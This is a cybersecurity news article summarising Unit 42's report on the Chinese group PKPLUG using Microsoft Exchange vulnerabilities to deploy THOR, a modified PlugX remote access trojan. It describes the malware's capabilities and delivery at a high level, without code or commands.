A sophisticated cyberespionage operation has emerged, directly attributed to a Chinese group utilizing vulnerabilities in Microsoft Exchange Servers unveiled earlier this March. This group, identified as PKPLUG (also known as Mustang Panda and HoneyMyte), has executed a new attack sequence deploying an undocumented variant of a remote access trojan, dubbed THOR, to compromised systems.
The Unit 42 threat intelligence team at Palo Alto Networks reported that the intrusions are uniquely characterized by a modified version of the modular PlugX malware. This malware, with roots tracing back to 2008, operates as a fully-fledged second-stage implant. It equips attackers with the capability for file management, keystroke logging, webcam control, and remote command shell access, posing significant threats to targeted organizations.
The Unit 42 technical write-up highlights a significant alteration in this variant: a code shift switching the iconic term ‘PLUG’ to ‘THOR.’ The earliest sample of this rebranded malware, identified in August 2019, reveals new delivery mechanisms and the exploitation of trusted binaries, broadening its attack vector spectrum.
Following Microsoft’s announcement on March 2 about the zero-day vulnerabilities exploited by the China-based group known as Hafnium, a wave of threat actors, including ransomware groups and cryptocurrency mining operators, began leveraging these vulnerabilities to install web shells for higher-level access. PKPLUG’s tactics illustrate an advanced operational capability, as researchers note their ability to bypass antivirus detection through the utilization of legitimate Windows executables, such as BITSAdmin, to fetch seemingly benign files from remote repositories.
The retrieved file contains an encrypted and compressed PlugX payload disguised as an advanced optimization tool, raising significant concerns regarding its potential to obscure malicious activities behind legitimate software capabilities. The latest PlugX sample houses diverse plug-in functionalities that empower attackers to surveil, modify, and interact with infected systems, amplifying their operational reach.
Unit 42’s findings delve into the command-and-control infrastructure linked to PKPLUG, revealing a pattern of behavior consistent with previously identified PlugX artifacts. For organizations seeking to bolster their defenses, further insights and indicators of compromise related to this incident can be accessed here. Additionally, a Python script for decrypting and unpacking PlugX payloads has been made publicly available by Unit 42, allowing stakeholders to better understand and mitigate these sophisticated threats.
